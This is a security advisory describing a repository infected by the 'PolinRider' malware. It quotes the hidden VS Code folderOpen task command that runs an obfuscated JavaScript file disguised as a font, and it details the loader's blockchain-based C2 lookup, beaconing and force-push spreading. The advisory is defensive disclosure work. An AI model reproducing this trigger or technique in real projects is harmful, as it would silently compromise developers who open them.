VDB

GCVE-110-OSM-2026-12701

GCVE-110-OSM-2026-12701
Advisory PublishedCVSS 9.6/10
Vulnetix · Advisory published March 29, 2026
A legitimate repository that has been infected by PolinRider, a DPRK malware that spreads by force-pushing rewritten commits from infected developers' machines into every repository they can access. It carries a hidden VS Code task that runs a JavaScript payload disguised as a font file when the folder is opened, and the payload retrieves and runs a next-stage malware from attacker infrastructure. The repository has hosted several successive versions of the payload, including the first observed copy of a variant that uses a non-font file extension to evade detection. Anyone who has cloned or opened this repository should treat their machine as potentially compromised. ## Payload 1: VS Code folderOpen task Malicious payload found in: `.vscode/tasks.json` - Trigger: a hidden background task labeled `eslint-check` with `"runOn": "folderOpen"` runs the fake font file with Node when the folder is opened in VS Code: `(command -v node >/dev/null 2>&1 && node ./public/fonts/fa-solid-300.llf) || (where node >nul 2>&1 && node ./public/fonts/fa-solid-300.llf) || echo ''`. - The file includes a `configurations` block (launch.json content) and a trailing comma, so strict JSON parsers reject it while VS Code (JSONC) still runs it. - History: a tasks.json running `public/fonts/fa-solid-400.woff2` from 2026-03-29, one running `public/fonts/fa-solid-500.woff2` first pushed 2026-09-08 13:12 UTC, and one running `public/fonts/fa-solid-300.llf` first pushed 2026-09-28 15:09 UTC (the first observed appearance of the .llf variant anywhere). ## Payload 2: fake font file Malicious payload found in: `public/fonts/fa-solid-300.llf` (current), previously `public/fonts/fa-solid-500.woff2` and `public/fonts/fa-solid-400.woff2` - The "font" is obfuscated JavaScript. The current build is 32,320 bytes, starts with 421 tab characters of padding, sets build marker `global.i = 'A8'`, and uses a `_0x` string-array obfuscator. `.llf` is not a font extension, so checks limited to `.woff2` files miss it. Node runs it regardless of extension. - The earlier 500 build was 32,006 bytes with build marker `A8-n*` and 273 tab characters of padding, and used the same wallet as the current build. - C2: NullReceiver technique. The loader queries public Ethereum RPC endpoints (with a Blockscout indexer fallback) for the most recent transaction from a fixed attacker wallet, decodes a C2 IP address from the recipient address, and fetches the next stage from that IP over port 443. The next stage is returned Base64-encoded in a custom response header and XOR-decoded. - Before running the second stage, the loader stores its build marker in the global `_V` and sends it to the C2 in a `Sec-V` request header, so the server knows which build is calling home. ## Persistence: auto-push tool on infected contributor machines Malicious payload found in: unknown (runs on infected developer machines, not committed to the repository) - The malware on an infected contributor's machine takes the newest commit on each branch, keeps its author name, email, date, and message, replaces the contents with the payload, and force-pushes the result to every branch within seconds. Commit dates in `git log` therefore do not show when the payload arrived. - `.gitignore` gains `config.bat`, `temp_auto_push.bat`, `temp_interactive_push.bat`, and `branch_structure.json` (the auto-push tool's working files). Their presence means at least one contributor's machine is infected. - The same .llf file was force-pushed from this account's credentials into other infected repositories within an hour of first appearing here.

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknownall (affected)—

Browse GCVE Records

3,105 records in the GCVE database · Updated October 4, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›